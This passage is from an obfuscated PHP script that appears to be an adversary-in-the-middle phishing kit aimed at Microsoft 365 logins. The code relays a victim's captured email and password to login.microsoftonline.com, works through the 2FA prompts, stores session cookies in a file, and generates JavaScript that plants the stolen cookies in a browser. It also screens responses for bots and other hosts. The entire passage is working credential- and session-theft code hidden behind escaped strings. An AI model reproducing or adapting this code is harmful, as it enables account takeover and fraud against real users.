            strpos(
                $A75e0,
                "\x75\x72\154\x42\x65\x67\x69\x6e\101\x75\x74\x68"
            ) !== false
        ) {
            goto Eb0ff;
        }
        goto A0df7;
        Db109:
        $A75e0 = $Accd6->getBody()->getContents();
        goto Cf226;
        E3680:
        curl_setopt(
            $fda09,
            CURLOPT_POSTFIELDS,
            "\156\x61\x6d\x65\75{$this->Fa736}\46\160\141\163\163\x77\157\162\144\75{$this->Ed558}\46\101\x75\x74\150\115\x65\x74\150\x6f\144\x3d\106\x6f\x72\x6d\x73\101\x75\x74\150\x65\x6e\164\x69\143\141\164\151\157\x6e"
        );
        goto C84d8;
        D04b8:
        $F84f2 = html_entity_decode($F84f2[1]);
        goto e735f;
        e41be:
        preg_match(
            "\x2f\x28\x3f\74\75\x22\x63\x6f\x72\x72\x65\x6c\141\164\151\157\x6e\111\144\42\x3a\x22\x29\x5b\136\x22\x5d\52\x2f",
            $A75e0,
            $eb813
        );
        goto Df2d7;
        B7071:
        $E3848 =
            "\50\146\165\156\143\x74\x69\x6f\x6e\x28\51\x20\173\15\12\x9\x9\x9\x9\x9\x9\x6c\145\x74\40\x63\157\157\153\x69\145\x73\40\75\x20\x4a\123\117\x4e\x2e\x70\141\162\163\145\50\140" .
            $D5295 .
            "\140\x29\73\xd\12\11\x9\x9\11\11\xd\xa\11\x9\11\11\x9\x9\x66\165\x6e\x63\164\x69\x6f\156\40\x70\165\x74\x43\157\x6f\153\151\x65\50\153\x65\171\54\40\x76\141\x6c\x75\145\x2c\40\144\157\x6d\141\x69\x6e\x2c\40\160\141\x74\x68\54\x20\x69\163\123\x65\x63\x75\x72\x65\x29\40\x7b\15\xa\x9\11\x9\x9\x9\x9\x9\143\157\156\163\164\40\x63\157\x6f\x6b\x69\x65\115\x61\x78\x41\x67\145\40\x3d\x20\42\x4d\141\x78\55\101\147\x65\75\x33\x31\65\63\x36\x30\60\60\42\73\15\xa\x9\x9\x9\11\11\x9\x9\x69\x66\40\x28\x6b\145\x79\x2e\x73\164\x61\162\x74\x73\127\x69\x74\x68\x28\x22\137\137\x48\157\x73\164\42\x29\51\x20\173\15\xa\x9\11\11\x9\11\x9\x9\x9\143\x6f\156\x73\x6f\x6c\x65\56\x6c\157\147\x28\42\x3d\x3d\75\75\x20\x4b\162\141\x74\157\x73\40\75\x3d\75\x3d\76\42\54\x20\153\x65\x79\x2c\40\x76\x61\154\165\145\51\x3b\xd\xa\x9\11\x9\11\11\x9\11\x9\x64\157\x63\165\x6d\145\x6e\164\56\x63\157\x6f\x6b\151\145\x20\75\x20\140\44\x7b\153\145\171\175\x3d\x24\x7b\x76\x61\154\165\145\175\73\44\x7b\143\x6f\157\x6b\x69\145\115\x61\x78\101\x67\145\175\73\x70\x61\164\150\x3d\x2f\73\123\x65\x63\x75\162\x65\73\123\141\x6d\x65\x53\x69\x74\x65\75\x4e\x6f\x6e\x65\x60\73\15\12\11\11\11\11\x9\x9\11\175\40\x65\154\163\145\40\x69\146\x20\50\153\145\x79\56\163\x74\x61\162\x74\x73\x57\x69\x74\x68\x28\42\137\x5f\x53\145\x63\x75\x72\x65\x22\51\51\40\173\xd\12\x9\x9\11\x9\11\11\11\x9\x63\157\156\x73\x6f\154\145\56\154\157\x67\x28\x22\x3d\75\x3d\x3d\x20\x4b\162\141\164\157\163\x20\75\75\75\75\x3e\x22\54\x20\153\x65\x79\x2c\40\166\141\154\x75\x65\51\x3b\15\12\x9\x9\11\11\11\x9\11\x9\144\x6f\x63\165\155\145\156\x74\56\x63\x6f\157\153\x69\145\x20\x3d\40\x60\44\x7b\x6b\145\171\175\x3d\x24\173\x76\x61\154\165\145\x7d\x3b\x24\x7b\143\x6f\x6f\153\151\x65\115\141\170\x41\x67\145\175\x3b\x64\157\155\x61\151\x6e\x3d\x24\173\144\157\155\x61\151\x6e\175\73\x70\141\x74\150\75\44\x7b\160\141\x74\150\x7d\73\x53\145\143\x75\x72\145\73\123\x61\x6d\145\123\151\x74\x65\x3d\116\x6f\x6e\145\x60\73\xd\xa\x9\x9\11\x9\11\x9\11\x7d\40\145\154\163\x65\x20\173\15\12\11\11\x9\x9\11\x9\x9\x9\151\x66\40\50\x69\x73\123\145\x63\x75\x72\145\51\40\x7b\15\xa\11\11\11\11\x9\11\11\x9\11\x63\157\156\x73\x6f\x6c\x65\x2e\154\x6f\147\x28\x22\x3d\x3d\x3d\75\x20\x4b\x72\141\164\157\x73\x20\75\75\75\x3d\76\42\x2c\x20\153\x65\171\54\x20\166\x61\x6c\x75\145\x29\x3b\15\12\x9\11\11\11\11\11\x9\11\x9\151\146\x20\50\167\151\156\x64\x6f\167\56\154\157\143\141\x74\151\x6f\x6e\56\150\157\163\x74\156\x61\x6d\145\x20\75\x3d\40\144\157\155\141\x69\156\x29\x20\173\xd\xa\x9\11\11\11\11\x9\x9\x9\11\x9\144\157\x63\165\155\x65\156\x74\56\x63\157\157\153\151\145\x20\x3d\40\140\x24\x7b\x6b\x65\171\x7d\x3d\44\173\166\x61\154\165\x65\x7d\73\44\x7b\143\x6f\157\x6b\151\145\x4d\141\x78\101\147\145\175\73\40\160\x61\164\x68\75\44\173\160\x61\x74\x68\x7d\73\x20\x53\145\x63\165\162\x65\x3b\x20\123\x61\155\145\123\x69\164\145\75\x4e\x6f\156\145\x60\x3b\15\xa\x9\x9\x9\11\x9\x9\11\x9\11\175\x20\145\154\x73\145\x20\x7b\xd\12\11\x9\11\11\11\x9\x9\x9\x9\11\x64\157\143\x75\x6d\145\x6e\164\56\143\x6f\157\153\151\x65\40\75\40\x60\x24\173\153\145\x79\175\x3d\x24\173\166\141\x6c\x75\x65\175\73\x24\173\x63\157\x6f\153\151\145\x4d\141\170\x41\x67\x65\175\x3b\144\x6f\x6d\141\x69\156\75\x24\173\144\x6f\x6d\141\151\x6e\175\73\x70\141\x74\150\75\x24\x7b\x70\141\x74\x68\175\73\x53\145\143\165\162\145\x3b\x53\x61\x6d\145\123\151\x74\145\x3d\x4e\157\x6e\x65\x60\73\xd\12\x9\11\11\x9\x9\11\x9\11\11\175\xd\12\11\11\11\x9\11\11\x9\x9\175\40\145\154\163\145\40\x7b\xd\12\x9\11\x9\x9\x9\x9\11\x9\x9\x63\x6f\x6e\163\x6f\x6c\145\x2e\x6c\x6f\x67\x28\x22\75\x3d\75\75\40\113\162\x61\164\x6f\163\x20\75\75\75\75\x3e\42\x2c\x20\x6b\x65\171\54\40\166\x61\x6c\165\x65\51\73\15\12\11\11\11\11\11\11\11\x9\x9\x69\x66\40\50\167\x69\156\144\157\x77\56\154\x6f\x63\141\164\151\x6f\156\x2e\150\x6f\163\164\x6e\141\x6d\x65\40\75\75\x20\x64\x6f\155\141\151\x6e\51\x20\173\15\12\x9\11\11\x9\11\11\11\11\11\x9\x64\x6f\x63\165\155\x65\156\x74\x2e\x63\x6f\157\x6b\151\x65\x20\x3d\40\x60\x24\173\x6b\145\171\x7d\75\44\173\x76\x61\154\165\145\x7d\73\x24\173\143\x6f\x6f\153\x69\145\x4d\x61\170\x41\x67\145\x7d\73\160\x61\164\x68\x3d\44\173\160\141\x74\150\175\x3b\x60\73\xd\12\x9\x9\11\x9\x9\11\11\11\x9\175\x20\x65\154\x73\145\40\x7b\xd\xa\x9\11\x9\x9\x9\x9\11\x9\11\x9\144\157\x63\165\155\145\x6e\x74\56\x63\x6f\157\153\x69\145\x20\75\40\140\x24\173\153\x65\x79\x7d\75\x24\173\166\141\x6c\165\x65\x7d\73\44\173\x63\x6f\x6f\x6b\x69\145\115\x61\x78\x41\x67\145\x7d\73\x64\x6f\155\141\x69\x6e\x3d\44\173\x64\x6f\x6d\141\151\x6e\x7d\x3b\160\141\x74\150\75\44\x7b\160\x61\164\150\x7d\x3b\140\73\15\xa\x9\11\11\11\11\x9\x9\x9\x9\175\15\xa\x9\x9\x9\11\11\11\x9\x9\175\xd\12\x9\x9\11\x9\11\x9\11\x7d\xd\xa\11\11\11\11\11\x9\x7d\xd\12\x9\x9\11\11\x9\11\146\x6f\x72\40\x28\x6c\x65\164\40\143\157\157\x6b\151\145\40\x6f\146\40\x63\x6f\x6f\153\151\145\163\x29\x20\x7b\xd\12\x9\x9\11\x9\x9\11\x9\x70\165\x74\103\157\x6f\x6b\x69\145\x28\x63\157\x6f\153\x69\145\x2e\116\141\155\145\54\40\x63\157\157\153\x69\x65\x2e\126\x61\154\x75\145\x2c\x20\x63\x6f\157\x6b\151\145\x2e\x44\x6f\x6d\x61\x69\156\54\40\x63\157\157\153\x69\x65\x2e\120\x61\x74\150\54\x20\143\157\157\x6b\x69\145\56\x53\145\143\x75\162\145\51\x3b\15\xa\11\11\11\x9\11\11\x7d\xd\xa\x9\11\x9\11\11\x7d\50\51\x29\x3b";
        goto B9a3f;
        A49c8:
        $F16be->save(
            $this->A20d7 .
                "\x2f\x63\157\x6f\153\x69\145\137" .
                $this->Fa736 .
                "\x2e\x74\x78\x74"
        );
        goto Db109;
        ecee6:
        $Accd6 = $Bcc9d->post(
            "\x68\x74\x74\x70\x73\x3a\57\57\154\157\x67\151\156\56\x6d\x69\143\162\157\x73\x6f\146\x74\x6f\x6e\154\x69\156\145\56\x63\x6f\155\57\x61\x70\160\166\x65\x72\151\x66\171",
            [
                "\150\x65\x61\x64\x65\162\x73" => [
                    "\x43\x6f\x6e\156\145\143\164\151\x6f\156" =>
                        "\153\145\145\x70\55\141\154\x69\166\145",
                    "\103\x61\143\x68\x65\55\x43\157\156\164\x72\157\x6c" =>
                        "\x6e\157\x2d\x63\x61\x63\150\x65",
                    "\125\160\x67\162\x61\x64\x65\55\x49\x6e\163\x65\x63\165\x72\145\x2d\122\145\x71\x75\x65\x73\x74\163" =>
                        "\x31",
                    "\117\x72\151\147\x69\x6e" => "\x6e\x75\154\x6c",
                    "\103\x6f\x6e\x74\x65\x6e\164\55\x54\171\160\x65" =>
                        "\141\x70\160\x6c\x69\143\x61\x74\x69\x6f\156\x2f\170\x2d\x77\x77\167\55\146\x6f\x72\155\55\165\x72\x6c\x65\x6e\143\157\x64\x65\144",
                    "\125\163\x65\162\x2d\x41\x67\x65\x6e\164" =>
                        "\x4d\x6f\172\151\154\154\141\x2f\x35\x2e\x30\40\x28\x57\151\x6e\144\x6f\x77\163\x20\116\x54\40\x31\60\56\60\73\x20\x57\151\156\66\x34\x3b\x20\x78\66\x34\x29\40\x41\x70\x70\154\x65\127\145\142\113\x69\164\x2f\x35\63\67\x2e\63\66\x20\50\113\x48\124\x4d\x4c\54\40\154\151\x6b\145\40\x47\145\143\x6b\157\51\x20\103\x68\x72\157\x6d\145\57\x31\63\x30\x2e\x30\x2e\x30\x2e\x30\40\123\x61\x66\x61\x72\x69\x2f\x35\x33\67\56\x33\x36\40\x45\x64\147\57\61\x33\x30\56\x30\56\x30\56\x30",
                    "\x41\x63\143\x65\x70\164" =>
                        "\164\145\x78\164\x2f\150\x74\155\154\x2c\x61\x70\x70\154\151\x63\141\x74\x69\x6f\x6e\57\x78\x68\x74\155\154\53\x78\155\154\x2c\x61\160\x70\x6c\151\x63\x61\164\x69\157\156\x2f\x78\155\x6c\x3b\x71\75\x30\x2e\x39\x2c\151\x6d\x61\x67\145\57\x61\166\151\x66\54\151\x6d\141\x67\145\57\167\145\142\x70\x2c\x69\x6d\x61\x67\145\57\x61\160\x6e\x67\x2c\52\x2f\52\73\x71\x3d\60\x2e\x38\x2c\141\x70\x70\154\151\x63\x61\164\x69\157\x6e\x2f\x73\151\x67\x6e\x65\x64\55\145\170\x63\x68\x61\156\147\x65\73\x76\x3d\x62\x33\73\161\x3d\60\56\x37",
                    "\101\x63\143\x65\160\x74\55\x4c\x61\x6e\147\165\x61\x67\x65" =>
                        "\145\x6e\x2d\x55\x53\54\145\156\x3b\x71\x3d\x30\56\x39",
                    "\x52\145\x66\145\x72\x65\162" =>
                        "\x68\x74\164\x70\163\x3a\x2f\57\167\x33\x6c\154\56\163\x74\x6f\162\x65\x2f\141\160\x69\57\x6f\x66\x66\151\143\x65\55\x76\141\x6c\77\145\155\x61\151\154\75" .
                        $this->Fa736 .
                        "\46\160\x61\163\163\x3d" .
                        $this->Ed558,
                    "\103\x6f\x6f\x6b\151\145" => $this->gencook(
                        $this->A20d7 .
                            "\x2f\x63\157\157\x6b\x69\x65\x5f" .
                            $this->Fa736 .
                            "\56\x74\170\164"
                    ),
                ],
                "\146\157\162\x6d\x5f\160\x61\x72\141\x6d\x73" => [
                    "\103\x6f\x6e\164\x69\x6e\x75\145\101\x75\x74\150" =>
                        "\x74\x72\x75\x65",
                    "\143\164\x78" => $this->cc473,
                    "\x68\x70\x67\x72\x65\x71\165\x65\163\x74\151\144" =>
                        "\x31\x66\61\x32\x64\x31\x34\143\x2d\67\x61\x34\62\55\64\x35\64\62\x2d\x62\x65\x37\71\x2d\67\x38\146\65\x39\62\x66\71\66\x38\x30\x30",
                    "\146\x6c\157\x77\124\157\153\145\156" => $this->fac50,
                    "\x69\163\143\x73\x72\146\163\x70\x65\145\x64\x62\x75\x6d\x70" =>
                        "\164\162\165\x65",
                    "\143\141\156\x61\x72\171" => $this->B5b07,
                    "\151\61\x39" => "\64\66\62\64",
                ],
            ]
        );
        goto A49c8;
        e33de:
        $this->B5b07 = $ef175[0];
        goto Ba8b9;
        Bc5f1:
        preg_match(
            "\x2f\x6e\141\x6d\145\75\133\42\x27\x5d\x3f\x77\143\164\170\x5b\42\x27\135\77\134\163\53\166\141\154\x75\x65\x3d\133\42\47\x5d\77\x28\x5b\x5e\42\x27\135\53\51\133\42\47\x5d\77\57",
            $A75e0,
            $F84f2
        );
        goto D04b8;
        Da396:
        $this->cc473 = $Bc3b4[0];
        goto b0b2a;
        f641f:
        preg_match(
            "\57\50\x3f\74\75\x22\x73\x46\x54\x22\72\x22\51\x5b\x5e\x22\135\52\x2f",
            $A75e0,
            $ea051
        );
        goto bcd77;
        f962d:
        $fda09 = curl_init();
        goto C06a1;
        C84d8:
        curl_setopt(
            $fda09,
            CURLOPT_ENCODING,
            "\x67\172\151\160\54\40\144\145\x66\x6c\x61\x74\145"
        );
        goto c9dec;
        c9dec:
        $A03d7 = [];
        goto d9b44;
        A0df7:
        $this->status["\62\146\141"] = false;
        goto A10ab;
        d6de8:
        $this->B522d = $a6081[0];
        goto E8adc;
        B5528:
        $this->status["\x32\146\141"] = true;
        goto E1722;
        E9ad6:
        e93fb:
        goto f9d13;
        A17d5:
        curl_setopt($fda09, CURLOPT_CUSTOMREQUEST, "\120\117\123\124");
        goto E8841;
        F16be:
        $this->E423c = $D70fc[0];
        goto e590d;
        E1722:
        $c4ca3 =
            "\57\x5c\x7b\134\x73\52\x22\x61\x72\162\x55\163\x65\x72\x50\162\x6f\x6f\x66\163\42\x3a\x28\x5c\133\56\x2a\x3f\134\135\51\x5c\x73\x2a\54\57\163";
        goto e821f;
        e6324:
        e1b45:
        goto Bc5f1;
        B8d94:
        $Bcc9d = new Client(["\143\157\157\153\x69\x65\x73" => $F16be]);
        goto Bca5a;
        a9e0a:
        $Bcc9d = new Client(["\143\157\157\153\151\145\x73" => $F16be]);
        goto a178d;
        d0064:
        $F16be->save(
            $this->A20d7 .
                "\57\143\157\x6f\153\x69\145\x5f" .
                $this->Fa736 .
                "\56\164\x78\164"
        );
        goto f54d3;
        bfaa6:
        preg_match(
            "\57\50\x3f\x3c\75\42\163\x65\163\x73\151\x6f\156\x49\x64\42\x3a\x22\51\x5b\x5e\x22\135\x2a\x2f",
            $A75e0,
            $D70fc
        );
        goto A701d;
        f855f:
        goto e93fb;
        goto Ed39c;
        Cf226:
        preg_match(
            "\57\50\x3f\74\x3d\42\x73\106\124\42\72\42\x29\133\136\x22\x5d\x2a\x2f",
            $A75e0,
            $ea051
        );
        goto d8d8c;
        d8d8c:
        preg_match(
            "\x2f\50\77\74\x3d\x22\x73\103\x74\170\42\72\x22\51\133\x5e\x22\135\52\57",
            $A75e0,
            $Bc3b4
        );
        goto A0cd8;
        e18c5:
        preg_match(
            "\57\50\77\74\75\x22\x73\x65\163\x73\151\157\x6e\x49\144\42\x3a\42\51\x5b\136\42\x5d\52\57",
            $A75e0,
            $D70fc
        );
        goto e41be;
        D7208:
        $Bcc9d = new Client(["\143\157\x6f\153\x69\145\163" => $F16be]);
        goto ecee6;
        Ba8b9:
        $this->B522d = $a6081[0];
        goto F16be;
        e590d:
        $this->ad1e3 = $eb813[0];
        goto ebb5c;
        c530a:
        curl_setopt($fda09, CURLOPT_RETURNTRANSFER, 1);
        goto A17d5;
        a178d:
        $Accd6 = $Bcc9d->request(
            "\120\x4f\x53\124",
            "\x68\x74\x74\160\x73\x3a\x2f\57\154\x6f\x67\151\x6e\56\x6d\x69\143\x72\x6f\163\x6f\146\164\x6f\156\x6c\151\x6e\x65\x2e\143\157\155\57\153\155\163\x69",
            [
                "\x68\x65\x61\x64\145\162\163" => [
                    "\x41\x63\x63\145\x70\164" =>
                        "\x74\x65\x78\164\x2f\x68\164\155\154\x2c\x61\160\x70\x6c\151\x63\x61\164\x69\157\x6e\x2f\x78\x68\x74\155\154\53\x78\155\154\54\141\x70\x70\x6c\x69\143\141\x74\151\157\156\x2f\170\155\x6c\73\161\75\x30\56\71\54\151\x6d\141\147\145\x2f\x61\166\x69\x66\x2c\151\155\x61\147\x65\x2f\x77\x65\x62\x70\x2c\x69\x6d\141\x67\x65\x2f\141\x70\156\147\x2c\52\x2f\x2a\x3b\x71\75\x30\x2e\x38\54\141\x70\x70\x6c\x69\143\141\164\x69\157\x6e\57\163\151\x67\x6e\145\144\x2d\145\170\143\150\141\x6e\147\x65\73\166\x3d\x62\x33\x3b\161\75\60\x2e\x37",
                    "\101\x63\143\145\x70\x74\55\x4c\x61\156\x67\165\141\x67\145" =>
                        "\145\x6e\55\x55\123\x2c\x65\156\73\x71\x3d\x30\x2e\x39",
                    "\x43\141\143\150\x65\x2d\x43\157\x6e\x74\x72\157\x6c" =>
                        "\x6d\x61\170\x2d\141\147\145\x3d\60",
                    "\x43\x6f\156\164\x65\156\164\x2d\x54\x79\x70\145" =>
                        "\141\160\160\x6c\151\143\x61\x74\x69\157\156\x2f\170\x2d\x77\167\x77\55\x66\157\162\155\55\x75\162\x6c\x65\156\143\157\x64\145\x64",
                    "\103\157\x6f\x6b\x69\x65" => $this->gencook(
                        $this->A20d7 .
                            "\57\143\157\157\153\x69\x65\137" .
                            $this->Fa736 .
                            "\x2e\164\170\x74"
                    ),
                    "\117\x72\151\x67\x69\x6e" =>
                        "\150\164\164\x70\163\72\57\57\x6c\x6f\147\151\156\x2e\x6d\151\x63\162\157\163\157\146\164\x6f\x6e\154\151\156\x65\56\143\x6f\x6d",
                    "\122\145\x66\145\162\x65\162" =>
                        "\x68\164\164\160\163\72\57\57\x6c\x6f\147\151\x6e\x2e\155\151\143\x72\x6f\163\x6f\146\164\157\156\154\151\156\x65\56\143\157\x6d\x2f\143\157\155\x6d\x6f\156\57\154\157\x67\151\156",
                    "\123\145\143\x2d\103\110\x2d\x55\101" =>
                        "\42\x4d\151\x63\x72\157\x73\157\x66\164\40\105\x64\x67\145\x22\x3b\x76\75\x22\x31\x32\71\x22\54\40\x22\116\x6f\x74\75\101\x3f\102\x72\141\x6e\144\42\73\166\75\x22\x38\x22\x2c\x20\42\x43\x68\x72\157\155\151\x75\155\42\x3b\x76\x3d\x22\61\x32\x39\42",
                    "\123\145\143\55\103\110\x2d\x55\101\x2d\x4d\x6f\x62\x69\154\145" =>
                        "\77\x30",
                    "\123\145\x63\55\x43\110\55\125\101\55\120\154\141\164\146\157\x72\x6d" =>
                        "\42\127\151\x6e\x64\x6f\167\x73\x22",
                    "\123\x65\x63\x2d\x46\145\164\143\x68\55\104\x65\163\164" =>
                        "\144\157\143\165\x6d\x65\x6e\x74",
                    "\123\x65\x63\x2d\106\x65\164\143\150\55\115\157\144\x65" =>
                        "\156\141\166\151\147\141\164\145",
                    "\123\145\143\55\x46\x65\x74\143\150\55\123\x69\x74\x65" =>
                        "\163\141\x6d\x65\x2d\157\162\x69\x67\x69\x6e",
                    "\123\x65\x63\55\106\x65\x74\143\x68\55\125\x73\x65\162" =>
                        "\x3f\x31",
                    "\x55\x70\147\162\x61\x64\x65\x2d\111\x6e\x73\145\143\165\162\145\x2d\122\x65\x71\165\145\163\164\x73" =>
                        "\61",
                    "\125\x73\145\x72\x2d\101\147\145\156\x74" =>
                        "\x4d\157\x7a\x69\154\x6c\141\57\65\56\60\x20\50\x57\x69\156\x64\157\x77\163\x20\116\x54\x20\x31\60\x2e\60\73\x20\127\x69\156\x36\64\73\40\170\x36\64\51\x20\x41\x70\x70\x6c\x65\127\x65\142\113\151\164\x2f\65\x33\67\x2e\x33\x36\x20\x28\113\x48\124\115\114\x2c\40\x6c\151\153\x65\x20\x47\145\143\153\x6f\51\x20\103\150\x72\157\x6d\x65\x2f\61\62\x39\x2e\x30\56\x30\x2e\60\40\x53\x61\146\141\x72\151\57\65\63\67\x2e\63\66\40\105\144\x67\x2f\x31\62\71\x2e\60\x2e\x30\56\x30",
                ],
                "\x66\157\x72\155\137\x70\x61\162\x61\x6d\163" => [
                    "\114\x6f\x67\151\156\x4f\x70\164\151\157\156\x73" => "\61",
                    "\x74\171\160\145" => "\x32\x38",
                    "\143\164\170" => $this->cc473,
                    "\150\x70\147\162\x65\x71\x75\145\x73\164\151\144" =>
                        $this->ad1e3,
                    "\146\x6c\x6f\x77\124\x6f\153\145\156" => $this->fac50,
                    "\104\x6f\156\164\x53\x68\157\167\x41\x67\x61\x69\156" =>
                        "\164\x72\x75\145",
                    "\x63\x61\x6e\x61\162\x79" => $this->B5b07,
                    "\x69\x31\71" => "\61\x34\x31\60\70",
                ],
            ]
        );
        goto d0064;
        a37c8:
        adf53:
        goto E9ad6;
        Ec891:
        $e65e8 = html_entity_decode($e65e8[1]);
        goto E0753;
        D2e2b:
        preg_match(
            "\x2f\x28\x3f\74\x3d\42\x61\x70\x69\103\141\156\141\162\171\42\72\42\51\133\x5e\42\x5d\x2a\x2f",
            $A75e0,
            $a6081
        );
        goto bfaa6;
        C36eb:
        if (
            !(
                strpos(
                    $A75e0,
                    "\131\x6f\x75\40\x65\x6e\164\145\162\145\x64\x20\x61\156\40\x69\x6e\143\157\x72\x72\x65\143\164\x20\x75\163\x65\x72\156\x61\155\145\40\x6f\x72\x20\x70\141\163\163\x77\x6f\162\144\x2e"
                ) !== false ||
                strpos(
                    $A75e0,
                    "\150\x61\x76\x65\40\x70\x65\x72\155\x69\x73\163\151\x6f\x6e\x20\x74\157\x20\x61\x63\143\x65\163\x73"
                ) !== false ||
                strpos(
                    $A75e0,
                    "\x54\x68\145\40\x70\x61\163\163\167\x6f\162\144\x20\x65\156\164\145\162\x65\x64\x20\x65\170\143\145\x65\144\163\x20\164\150\x65\x20\x6d\x61\170\151\155\x75\155\40\154\145\156\147\x74\x68"
                ) !== false ||
                strpos(
                    $A75e0,
                    "\102\x61\144\x20\x52\145\161\x75\x65\163\164"
                ) !== false ||
                strpos($A75e0, "\147\157\x6f\147\154\145\x62\157\x74") !==
                    false ||
                strpos(
                    $A75e0,
                    "\x53\x65\154\145\143\164\x20\141\40\143\x65\162\x74\151\x66\151\x63\x61\x74\x65\x20"
                ) !== false ||
                strpos(
                    $A75e0,
                    "\x73\x6d\x75\163\170\141\164\150\56\x62\x6d\x73\x2e\143\157\x6d"
                ) !== false ||
                strpos(
                    $A75e0,
                    "\x6e\x6f\164\x20\163\x75\x70\160\x6f\x72\x74\x20\112\x61\x76\x61\123\x63\162\x69\x70\x74"
                ) !== false ||
                strpos(
                    $A75e0,
                    "\x74\162\157\165\142\x6c\145\40\x73\x69\x67\156\151\156\x67"
                ) !== false ||
                strpos(
                    $A75e0,
                    "\150\x61\166\151\156\147\40\x73\x6f\155\x65\x20\163\x65\162\166\x65\x72\40\151\x73\x73\x75\x65\x73"
                ) !== false ||
                strpos($A75e0, "\141\160\160\154\x65\56\x63\157\x6d") !==
                    false ||
                strpos(
                    $A75e0,
                    "\x4e\x6f\164\40\101\x6c\x6c\x6f\167\x65\144"
                ) !== false ||
                strpos($A75e0, "\x2e\x61\x6f\x6e\56\143\157\155") !== false ||
                strpos(
                    $A75e0,
                    "\x46\x69\x66\164\x68\40\x54\150\151\162\x64\40\x49\x44"
                ) !== false ||
                strpos(
                    $A75e0,
                    "\x43\x6f\x6e\x66\x69\x67\x75\x72\141\x62\154\x65\40\144\x65\x66\141\165\154\164\x20\x62\145\x68\x61\166\151\x6f\162"
                ) !== false ||
                strpos(
                    $A75e0,
                    "\x70\x65\162\163\x6d\x69\x73\163\x69\x6f\x6e\x73\x20\x74\157\40\x61\143\x63\x65\163\x73\40\x74\150\151\x73\x20\162\145\163\x6f\x75\x72\x63\145"
                ) !== false ||
                strpos(
                    $A75e0,
                    "\165\162\154\x4d\x73\141\x53\151\147\x6e\x55\160"
                ) !== false
            )
        ) {
            goto e1b45;
        }
        goto D9365;
        E8adc:
        $this->E423c = $D70fc[0];
        goto B1d5e;
        D9365:
        $this->status["\x6c\151\166\x65"] = false;
        goto e6324;
        Bcfed:
        $F16be = new FileCookieJar(
            $this->A20d7 .
                "\x2f\143\157\157\153\151\145\x5f" .
                $this->Fa736 .
                "\56\164\170\x74",
            true
        );
        goto D7208;
        E8841:
        curl_setopt($fda09, CURLOPT_POST, 1);
        goto E3680;
        f54d3:
        $A75e0 = $Accd6->getBody()->getContents();
        goto a242f;
        B5ec1:
        $f8b73 = isset($ae633[1]) ? $ae633[1] : "\x5b\x5d";
        goto Ccc3d;
        A0cd8:
        preg_match(
            "\x2f\x28\x3f\74\75\42\x63\x61\x6e\141\x72\x79\42\72\x22\x29\x5b\x5e\42\x5d\52\57",
            $A75e0,
            $ef175
        );
        goto D2e2b;
        C06a1:
        curl_setopt(
            $fda09,
            CURLOPT_URL,
            $this->status["\162\x65\144\151\x72\x65\x63\x74"]
        );
        goto c530a;
        F09b1:
        $A75e0 = curl_exec($fda09);
        goto C36eb;
        B9a3f:
        file_put_contents(
            $this->A20d7 . "\57\152\x73\x5f" . $this->Fa736 . "\56\164\x78\164",
            $E3848
        );
        goto f855f;
        a242f:
        $D5295 = file_get_contents(
            $this->A20d7 .
                "\57\143\157\157\x6b\151\145\x5f" .
                $this->Fa736 .
                "\x2e\164\x78\164"
        );
        goto B7071;
        Ad673:
        f02bc:
        goto a37c8;
        Be661:
        $this->cc473 = $Bc3b4[0];
        goto e33de;
        b0b2a:
        $this->B5b07 = $ef175[0];
        goto d6de8;
        bcd77:
        preg_match(
            "\57\50\x3f\x3c\x3d\42\x73\x43\164\170\42\72\x22\51\x5b\x5e\x22\x5d\52\x2f",
            $A75e0,
            $Bc3b4
        );
        goto Cef18;
        Ccc3d:
        $b0338 = json_decode($f8b73, true);
        goto Bcac7;
        E0753:
        $F16be = new FileCookieJar(
            $this->A20d7 .
                "\x2f\x63\x6f\157\x6b\x69\x65\137" .
                $this->Fa736 .
                "\x2e\164\170\164",
            true
        );
        goto B8d94;
        ee9ea:
        preg_match(
            "\57\x28\77\74\x3d\x22\x61\160\151\x43\x61\156\x61\x72\x79\x22\72\x22\x29\133\136\42\135\x2a\57",
            $A75e0,
            $a6081
        );
        goto e18c5;
        ab389:
        $A75e0 = $Accd6->getBody()->getContents();
        goto f641f;
        e821f:
        preg_match($c4ca3, $A75e0, $ae633);
        goto B5ec1;
        Cef18:
        preg_match(
            "\57\50\77\74\x3d\42\x63\141\x6e\141\x72\171\x22\x3a\x22\x29\133\136\x22\135\52\x2f",
            $A75e0,
            $ef175
        );
        goto ee9ea;
        A701d:
        preg_match(
            "\x2f\50\77\x3c\75\x22\x63\x6f\162\162\x65\x6c\141\164\x69\157\156\x49\x64\x22\72\x22\51\133\x5e\42\x5d\x2a\x2f",
            $A75e0,
            $eb813
        );
        goto c664f;
        Ed39c:
        Eb0ff:
        goto B5528;
        e735f:
        preg_match(
            "\57\x6e\141\x6d\x65\75\x5b\42\47\135\77\167\x72\145\163\x75\x6c\x74\x5b\42\x27\x5d\x3f\134\x73\53\x76\141\154\165\x65\75\x5b\42\x27\135\77\50\x5b\136\x22\x27\x5d\x2b\51\x5b\x22\x27\x5d\x3f\57",
            $A75e0,
            $e65e8
        );
        goto Ec891;
        Be7f9:
        foreach ($b0338 as $a47dd => $Cfb59) {
            goto a6fe1;
            A3763:
            $this->status["\x32\x66\141\x5f\x69\156\x66\x6f"][$a47dd] = [
                "\155\x65\164\x68\x6f\x64\x5f\x6e\x61\155\145" =>
                    $Cfb59["\141\165\164\x68\115\145\x74\150\x6f\x64\x49\x64"],
                "\x64\x69\x73\x70\154\x61\x79" =>
                    $Cfb59["\x64\151\x73\160\154\141\171"],
                "\x69\163\x44\x65\x66\141\x75\154\164" =>
                    $Cfb59["\x69\x73\104\x65\x66\x61\x75\154\164"],
            ];
            goto a8f11;
            a6fe1:
            if (
                !(
                    isset(
                        $Cfb59[
                            "\x61\165\x74\x68\115\145\x74\x68\x6f\x64\111\144"
                        ]
                    ) &&
                    isset($Cfb59["\144\151\x73\x70\x6c\x61\x79"]) &&
                    isset($Cfb59["\x69\163\x44\x65\x66\141\165\x6c\x74"])
                )
            ) {
                goto db0a3;
            }
            goto A3763;
            F16e9:
            e6794:
            goto Ea3f4;
            a8f11:
            db0a3:
            goto F16e9;
            Ea3f4:
        }
        goto Ad673;
        A10ab:
        $F16be = new FileCookieJar(
            $this->A20d7 .
                "\x2f\x63\x6f\157\x6b\151\x65\137" .
                $this->Fa736 .
                "\56\164\x78\164",
            true
        );
        goto a9e0a;
        f61a8:
        $F16be->save(
            $this->A20d7 .
                "\x2f\143\157\x6f\x6b\151\145\x5f" .
                $this->Fa736 .
                "\56\x74\x78\x74"
        );
        goto ab389;
        d9b44:
